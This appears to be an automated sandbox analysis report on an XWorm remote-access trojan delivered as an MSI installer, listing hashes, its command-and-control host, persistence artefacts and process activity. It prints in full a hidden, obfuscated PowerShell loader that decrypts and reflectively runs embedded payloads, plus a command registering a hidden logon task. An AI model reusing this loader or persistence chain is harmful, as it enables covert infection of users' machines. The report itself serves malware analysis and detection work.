xworm | 594e87ea4d40331411e9b52033db03db5fd2399c023b3f132f277b6ad40535d4

Analysis

max time kernel
251s
max time network
295s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
11-05-2024 08:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test.msi
Size

1.1MB
MD5

0dbd897947fd3fd75af9b67b8517d2f4
SHA1

ef3fb6baf23c3228a9dc9751f1af5178c12d5a33
SHA256

594e87ea4d40331411e9b52033db03db5fd2399c023b3f132f277b6ad40535d4
SHA512

b43547b23a1969da024bfaed654bcf6fca167962dd09810191e3ee838460b66ba92307009d0034efb9c08fc80f374ceff612b83a5f8a840bbb6b56f42c9183ab
SSDEEP

24576:xEfVw748eBaCifrIFI24kuMdJhycvkA5nY28ERhpZQKAv671XlmEtnOr:xEyc8eorIF74kuMdJ0cvtnY28ERh/QwC

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

case-shield.gl.at.ply.gg:26501

Attributes

Install_directory
%Userprofile%
install_file
system.exe

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3676-254-0x00000000091D0000-0x00000000091EC000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 3676 powershell.exe
9 3676 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

2472 powershell.exe
816 powershell.exe
3676 powershell.exe
1740 powershell.exe
2840 powershell.exe
3768 powershell.exe
4176 powershell.exe

flow	pid	process
5	3676	powershell.exe
9	3676	powershell.exe

pid	process
2472	powershell.exe
816	powershell.exe
3676	powershell.exe
1740	powershell.exe
2840	powershell.exe
3768	powershell.exe
4176	powershell.exe

Drops startup file 3 IoCs

Processes:

TBYPAE.exepowershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSBLTR.lnk	TBYPAE.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk	powershell.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

TBYPAE.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\OSBLTR = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windata\\system.exe\""	TBYPAE.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\system.exe"	powershell.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 ip-api.com

flow	ioc
4	ip-api.com

AutoIT Executable 35 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral1/memory/4756-259-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/2336-1226-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/2336-1227-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1228-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1230-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1233-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1238-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1252-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1254-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1258-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/2248-1260-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1276-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1277-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1278-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1279-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1280-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1281-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/3600-1283-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/3600-1284-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1285-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1286-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1287-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1288-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1289-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1290-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4516-1292-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4516-1293-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1294-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1295-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1296-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1297-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1298-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1299-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/816-1302-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe
behavioral1/memory/4756-1303-0x0000000000400000-0x00000000004C9000-memory.dmp	autoit_exe

Drops file in Windows directory 10 IoCs

Processes:

msiexec.exetaskmgr.exe

description	ioc	process
File created	C:\Windows\Installer\SourceHash{29EF7317-DCA1-4159-97B2-C883AD400AC6}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA1BE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA20E.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe
File opened for modification	C:\Windows\Installer\e57a0e3.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\e57a0e3.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe

Executes dropped EXE 7 IoCs

Processes:

MSIA20E.tmpTBYPAE.exesystem.exesystem.exesystem.exesystem.exesystem.exe

pid process

2892 MSIA20E.tmp
4756 TBYPAE.exe
2336 system.exe
2248 system.exe
1620 system.exe
3600 system.exe
4516 system.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
2892	MSIA20E.tmp
4756	TBYPAE.exe
2336	system.exe
2248	system.exe
1620	system.exe
3600	system.exe
4516	system.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3572 schtasks.exe
1924 schtasks.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings powershell.exe

pid	process
3572	schtasks.exe
1924	schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msiexec.exeTBYPAE.exe

pid	process
292	msiexec.exe
292	msiexec.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe
4756	TBYPAE.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

TBYPAE.exe

pid process

4756 TBYPAE.exe

pid	process
4756	TBYPAE.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exevssvc.exesrtasks.exepowershell.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	4780	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4780	msiexec.exe
Token: SeSecurityPrivilege	292	msiexec.exe
Token: SeCreateTokenPrivilege	4780	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4780	msiexec.exe
Token: SeLockMemoryPrivilege	4780	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4780	msiexec.exe
Token: SeMachineAccountPrivilege	4780	msiexec.exe
Token: SeTcbPrivilege	4780	msiexec.exe
Token: SeSecurityPrivilege	4780	msiexec.exe
Token: SeTakeOwnershipPrivilege	4780	msiexec.exe
Token: SeLoadDriverPrivilege	4780	msiexec.exe
Token: SeSystemProfilePrivilege	4780	msiexec.exe
Token: SeSystemtimePrivilege	4780	msiexec.exe
Token: SeProfSingleProcessPrivilege	4780	msiexec.exe
Token: SeIncBasePriorityPrivilege	4780	msiexec.exe
Token: SeCreatePagefilePrivilege	4780	msiexec.exe
Token: SeCreatePermanentPrivilege	4780	msiexec.exe
Token: SeBackupPrivilege	4780	msiexec.exe
Token: SeRestorePrivilege	4780	msiexec.exe
Token: SeShutdownPrivilege	4780	msiexec.exe
Token: SeDebugPrivilege	4780	msiexec.exe
Token: SeAuditPrivilege	4780	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4780	msiexec.exe
Token: SeChangeNotifyPrivilege	4780	msiexec.exe
Token: SeRemoteShutdownPrivilege	4780	msiexec.exe
Token: SeUndockPrivilege	4780	msiexec.exe
Token: SeSyncAgentPrivilege	4780	msiexec.exe
Token: SeEnableDelegationPrivilege	4780	msiexec.exe
Token: SeManageVolumePrivilege	4780	msiexec.exe
Token: SeImpersonatePrivilege	4780	msiexec.exe
Token: SeCreateGlobalPrivilege	4780	msiexec.exe
Token: SeBackupPrivilege	5044	vssvc.exe
Token: SeRestorePrivilege	5044	vssvc.exe
Token: SeAuditPrivilege	5044	vssvc.exe
Token: SeBackupPrivilege	292	msiexec.exe
Token: SeRestorePrivilege	292	msiexec.exe
Token: SeRestorePrivilege	292	msiexec.exe
Token: SeTakeOwnershipPrivilege	292	msiexec.exe
Token: SeRestorePrivilege	292	msiexec.exe
Token: SeTakeOwnershipPrivilege	292	msiexec.exe
Token: SeRestorePrivilege	292	msiexec.exe
Token: SeTakeOwnershipPrivilege	292	msiexec.exe
Token: SeRestorePrivilege	292	msiexec.exe
Token: SeTakeOwnershipPrivilege	292	msiexec.exe
Token: SeRestorePrivilege	292	msiexec.exe
Token: SeTakeOwnershipPrivilege	292	msiexec.exe
Token: SeRestorePrivilege	292	msiexec.exe
Token: SeTakeOwnershipPrivilege	292	msiexec.exe
Token: SeBackupPrivilege	1620	srtasks.exe
Token: SeRestorePrivilege	1620	srtasks.exe
Token: SeSecurityPrivilege	1620	srtasks.exe
Token: SeTakeOwnershipPrivilege	1620	srtasks.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	816	powershell.exe
Token: SeIncreaseQuotaPrivilege	816	powershell.exe
Token: SeSecurityPrivilege	816	powershell.exe
Token: SeTakeOwnershipPrivilege	816	powershell.exe
Token: SeLoadDriverPrivilege	816	powershell.exe
Token: SeSystemProfilePrivilege	816	powershell.exe
Token: SeSystemtimePrivilege	816	powershell.exe
Token: SeProfSingleProcessPrivilege	816	powershell.exe
Token: SeIncBasePriorityPrivilege	816	powershell.exe
Token: SeCreatePagefilePrivilege	816	powershell.exe

Suspicious use of FindShellTrayWindow 53 IoCs

Processes:

msiexec.exetaskmgr.exe

pid	process
4780	msiexec.exe
4780	msiexec.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe

Suspicious use of SendNotifyMessage 51 IoCs

Processes:

taskmgr.exe

pid	process
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe
4852	taskmgr.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

powershell.exe

pid process

3676 powershell.exe

pid	process
3676	powershell.exe

Suspicious use of WriteProcessMemory 50 IoCs

Processes:

msiexec.exeMSIA20E.tmpTBYPAE.execmd.execmd.exepowershell.exeWScript.execmd.exepowershell.exe

description	pid	process	target process
PID 292 wrote to memory of 1620	292	msiexec.exe	srtasks.exe
PID 292 wrote to memory of 1620	292	msiexec.exe	srtasks.exe
PID 292 wrote to memory of 2892	292	msiexec.exe	MSIA20E.tmp
PID 292 wrote to memory of 2892	292	msiexec.exe	MSIA20E.tmp
PID 292 wrote to memory of 2892	292	msiexec.exe	MSIA20E.tmp
PID 2892 wrote to memory of 948	2892	MSIA20E.tmp	cmd.exe
PID 2892 wrote to memory of 948	2892	MSIA20E.tmp	cmd.exe
PID 2892 wrote to memory of 948	2892	MSIA20E.tmp	cmd.exe
PID 2892 wrote to memory of 4756	2892	MSIA20E.tmp	TBYPAE.exe
PID 2892 wrote to memory of 4756	2892	MSIA20E.tmp	TBYPAE.exe
PID 2892 wrote to memory of 4756	2892	MSIA20E.tmp	TBYPAE.exe
PID 4756 wrote to memory of 5092	4756	TBYPAE.exe	cmd.exe
PID 4756 wrote to memory of 5092	4756	TBYPAE.exe	cmd.exe
PID 4756 wrote to memory of 5092	4756	TBYPAE.exe	cmd.exe
PID 4756 wrote to memory of 4824	4756	TBYPAE.exe	WSCript.exe
PID 4756 wrote to memory of 4824	4756	TBYPAE.exe	WSCript.exe
PID 4756 wrote to memory of 4824	4756	TBYPAE.exe	WSCript.exe
PID 5092 wrote to memory of 3572	5092	cmd.exe	schtasks.exe
PID 5092 wrote to memory of 3572	5092	cmd.exe	schtasks.exe
PID 5092 wrote to memory of 3572	5092	cmd.exe	schtasks.exe
PID 948 wrote to memory of 2472	948	cmd.exe	powershell.exe
PID 948 wrote to memory of 2472	948	cmd.exe	powershell.exe
PID 948 wrote to memory of 2472	948	cmd.exe	powershell.exe
PID 2472 wrote to memory of 816	2472	powershell.exe	powershell.exe
PID 2472 wrote to memory of 816	2472	powershell.exe	powershell.exe
PID 2472 wrote to memory of 816	2472	powershell.exe	powershell.exe
PID 2472 wrote to memory of 4380	2472	powershell.exe	WScript.exe
PID 2472 wrote to memory of 4380	2472	powershell.exe	WScript.exe
PID 2472 wrote to memory of 4380	2472	powershell.exe	WScript.exe
PID 4380 wrote to memory of 4900	4380	WScript.exe	cmd.exe
PID 4380 wrote to memory of 4900	4380	WScript.exe	cmd.exe
PID 4380 wrote to memory of 4900	4380	WScript.exe	cmd.exe
PID 4900 wrote to memory of 3676	4900	cmd.exe	powershell.exe
PID 4900 wrote to memory of 3676	4900	cmd.exe	powershell.exe
PID 4900 wrote to memory of 3676	4900	cmd.exe	powershell.exe
PID 3676 wrote to memory of 1740	3676	powershell.exe	powershell.exe
PID 3676 wrote to memory of 1740	3676	powershell.exe	powershell.exe
PID 3676 wrote to memory of 1740	3676	powershell.exe	powershell.exe
PID 3676 wrote to memory of 2840	3676	powershell.exe	powershell.exe
PID 3676 wrote to memory of 2840	3676	powershell.exe	powershell.exe
PID 3676 wrote to memory of 2840	3676	powershell.exe	powershell.exe
PID 3676 wrote to memory of 3768	3676	powershell.exe	powershell.exe
PID 3676 wrote to memory of 3768	3676	powershell.exe	powershell.exe
PID 3676 wrote to memory of 3768	3676	powershell.exe	powershell.exe
PID 3676 wrote to memory of 4176	3676	powershell.exe	powershell.exe
PID 3676 wrote to memory of 4176	3676	powershell.exe	powershell.exe
PID 3676 wrote to memory of 4176	3676	powershell.exe	powershell.exe
PID 3676 wrote to memory of 1924	3676	powershell.exe	schtasks.exe
PID 3676 wrote to memory of 1924	3676	powershell.exe	schtasks.exe
PID 3676 wrote to memory of 1924	3676	powershell.exe	schtasks.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\test.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4780

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:292

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\Installer\MSIA20E.tmp
"C:\Windows\Installer\MSIA20E.tmp"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2892

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\loader (5).bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:948

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zzKVnsJKnozsmwXvfEHuC6CO4y3J9kqI8i4PQxgBEQY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Zet+bBMxhydASTp2X5UNA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $qKnYN=New-Object System.IO.MemoryStream(,$param_var); $QRXYz=New-Object System.IO.MemoryStream; $ylerv=New-Object System.IO.Compression.GZipStream($qKnYN, [IO.Compression.CompressionMode]::Decompress); $ylerv.CopyTo($QRXYz); $ylerv.Dispose(); $qKnYN.Dispose(); $QRXYz.Dispose(); $QRXYz.ToArray();}function execute_function($param_var,$param2_var){ $eVLsQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Nfhti=$eVLsQ.EntryPoint; $Nfhti.Invoke($null, $param2_var);}$SyUpl = 'C:\Users\Admin\AppData\Local\Temp\loader (5).bat';$host.UI.RawUI.WindowTitle = $SyUpl;$TCVQo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SyUpl).Split([Environment]::NewLine);foreach ($hHqem in $TCVQo) { if ($hHqem.StartsWith(':: ')) { $FEGCp=$hHqem.Substring(3); break; }}$payloads_var=[string[]]$FEGCp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2472

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_654_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_654.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:816

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_654.vbs"
5⤵
- Suspicious use of WriteProcessMemory
PID:4380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_654.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:4900

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zzKVnsJKnozsmwXvfEHuC6CO4y3J9kqI8i4PQxgBEQY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Zet+bBMxhydASTp2X5UNA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $qKnYN=New-Object System.IO.MemoryStream(,$param_var); $QRXYz=New-Object System.IO.MemoryStream; $ylerv=New-Object System.IO.Compression.GZipStream($qKnYN, [IO.Compression.CompressionMode]::Decompress); $ylerv.CopyTo($QRXYz); $ylerv.Dispose(); $qKnYN.Dispose(); $QRXYz.Dispose(); $QRXYz.ToArray();}function execute_function($param_var,$param2_var){ $eVLsQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Nfhti=$eVLsQ.EntryPoint; $Nfhti.Invoke($null, 